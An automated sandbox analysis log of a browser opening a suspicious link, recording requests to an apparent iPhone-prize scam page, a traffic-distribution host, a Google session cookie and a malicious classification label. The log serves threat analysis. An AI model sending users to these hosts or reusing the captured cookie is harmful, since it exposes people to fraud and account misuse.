Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/x1.png HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/box-iphone14pro.png HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/box_open.png HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/flag-icon/flags/1x1/us.svg HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y1uy13f.xuowltwo.live/media/mainstream/flag-icon/css/flag-icon.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/iphone14pro.png HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/l.png HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/box_closed.png HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/fr4.jpg HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/fr5.jpg HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/fr2.jpg HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ExtService.svc/getextparams HTTP/1.1Host: jsontdsexit2.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/like.png HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/fr1.jpg HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/fr3.jpg HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/fr6.jpg HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/fr11.jpg HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/top_red.png HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/x1.png HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/box-iphone14pro.png HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/box_open.png HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/flag-icon/flags/1x1/us.svg HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/fr4.jpg HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/box_closed.png HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/alert.mp3 HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/fr5.jpg HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/fr6.jpg HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/all/ab/fr11.jpg HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/mainstream/alert.mp3 HTTP/1.1Host: y1uy13f.xuowltwo.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: unknownDNS traffic detected: queries for: clients2.google.com
Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk
Source: chromecache_82.1.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
Source: chromecache_82.1.drString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
Source: chromecache_99.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v17/mem8YaGs126MiZpBA-UFUZ0bf8pkAp6a.woff2)
Source: chromecache_99.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v17/mem8YaGs126MiZpBA-UFVZ0bf8pkAg.woff2)
Source: chromecache_99.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v17/mem8YaGs126MiZpBA-UFVp0bf8pkAp6a.woff2)
Source: chromecache_99.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v17/mem8YaGs126MiZpBA-UFW50bf8pkAp6a.woff2)
Source: chromecache_99.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v17/mem8YaGs126MiZpBA-UFWJ0bf8pkAp6a.woff2)
Source: chromecache_99.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v17/mem8YaGs126MiZpBA-UFWZ0bf8pkAp6a.woff2)
Source: chromecache_99.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v17/mem8YaGs126MiZpBA-UFWp0bf8pkAp6a.woff2)
Source: chromecache_79.1.drString found in binary or memory: https://getbootstrap.com/)
Source: chromecache_79.1.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: chromecache_79.1.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: chromecache_96.1.drString found in binary or memory: https://xuowltwo.live/crhhigmk/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_BITS_732_379165751Jump to behavior
Source: classification engineClassification label: mal56.win@20/82@22/11
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=1980,i,12541706661546956868,10376714994367635285,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "http://az9.pl/
